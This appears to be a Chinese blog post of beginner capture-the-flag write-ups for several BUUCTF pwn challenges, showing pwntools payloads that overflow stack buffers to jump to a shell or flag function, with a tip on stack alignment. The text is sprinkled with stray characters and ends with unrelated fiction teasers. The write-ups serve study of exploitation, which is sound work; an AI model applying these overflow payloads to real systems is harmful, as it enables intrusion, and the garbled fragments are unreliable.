【pwn學(xué)習(xí)】buuctf pwn題目(一)

test_you_nc

進(jìn)去看main里面就是sh



所以nc就好


rip

checksec一下發(fā)現(xiàn)是64位



看一下代碼沒有任何過濾直接一個rop應(yīng)該就行了



有個fun函數(shù)直接就有sh了隔披,就跳過去就好了

payload

system_addr = 0x0401186
payload = flat(
    'A'*15, 0, system_addr
)
cn.sendline(payload)
cn.interactive()

奇怪的是
system_addr = 0x0401186
打到遠(yuǎn)程的話會報錯本地沒有問題


報錯原因百度了一下好像是因?yàn)闂3鰡栴}了
http://blog.eonew.cn/archives/958
少個push就沒問題了
所以最后payload

system_addr = 0x0401187
payload = flat(
    'A'*15, 0, system_addr
)
cn.sendline(payload)
cn.interactive()

主要是2.27的system多了一個movaps需要對齊rsp

warmup_csaw_2016

先checksec一下文件



反編譯一下
sub_40060D就是一個system地址所以只要跳過去就好了
感覺比上一個簡單



這次學(xué)乖了多了一個1

pwn1_sctf_2016


32位的
還是反編譯先
好像是c++有點(diǎn)難度了



居然沒有棧溢出了震驚

難道是格式化字符串粹懒?



有個getflag的函數(shù)
估計跳過去就行可是怎么跳呢



FUZZ了一下會把I變成you
很多個i變成you就會產(chǎn)生溢出

所以需要溢出0x3C
還有4個ebp
然后加上那個flag的return地址就好啦



60個好像不行啊奇怪
debug了一下

在這里發(fā)生了棧溢出

0x3c是60
所以要放20個i
就會有60個布滿了
所以payload


z('b*0x080492BF')
system_addr = 0x08048F0E
payload = flat('I'*20,'0'*4,system_addr)

cn.sendline(payload)
cn.interactive()
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末烂斋,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子陕壹,更是在濱河造成了極大的恐慌咬崔,老刑警劉巖问欠,帶你破解...
    沈念sama閱讀 218,284評論 6 506
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件山孔,死亡現(xiàn)場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)伐厌,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,115評論 3 395
  • 文/潘曉璐 我一進(jìn)店門承绸,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人挣轨,你說我怎么就攤上這事军熏。” “怎么了卷扮?”我有些...
    開封第一講書人閱讀 164,614評論 0 354
  • 文/不壞的土叔 我叫張陵荡澎,是天一觀的道長。 經(jīng)常有香客問我晤锹,道長摩幔,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,671評論 1 293
  • 正文 為了忘掉前任抖甘,我火速辦了婚禮,結(jié)果婚禮上葫慎,老公的妹妹穿的比我還像新娘衔彻。我一直安慰自己,他們只是感情好偷办,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,699評論 6 392
  • 文/花漫 我一把揭開白布艰额。 她就那樣靜靜地躺著,像睡著了一般椒涯。 火紅的嫁衣襯著肌膚如雪柄沮。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,562評論 1 305
  • 那天废岂,我揣著相機(jī)與錄音祖搓,去河邊找鬼。 笑死湖苞,一個胖子當(dāng)著我的面吹牛拯欧,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播财骨,決...
    沈念sama閱讀 40,309評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼镐作,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了隆箩?” 一聲冷哼從身側(cè)響起该贾,我...
    開封第一講書人閱讀 39,223評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎捌臊,沒想到半個月后杨蛋,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,668評論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,859評論 3 336
  • 正文 我和宋清朗相戀三年六荒,在試婚紗的時候發(fā)現(xiàn)自己被綠了护姆。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 39,981評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡掏击,死狀恐怖卵皂,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情砚亭,我是刑警寧澤灯变,帶...
    沈念sama閱讀 35,705評論 5 347
  • 正文 年R本政府宣布,位于F島的核電站捅膘,受9級特大地震影響添祸,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜寻仗,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,310評論 3 330
  • 文/蒙蒙 一刃泌、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧署尤,春花似錦耙替、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,904評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至箕别,卻和暖如春铜幽,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背串稀。 一陣腳步聲響...
    開封第一講書人閱讀 33,023評論 1 270
  • 我被黑心中介騙來泰國打工除抛, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人母截。 一個月前我還...
    沈念sama閱讀 48,146評論 3 370
  • 正文 我出身青樓镶殷,卻偏偏與公主長得像,于是被迫代替她去往敵國和親微酬。 傳聞我的和親對象是個殘疾皇子绘趋,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,933評論 2 355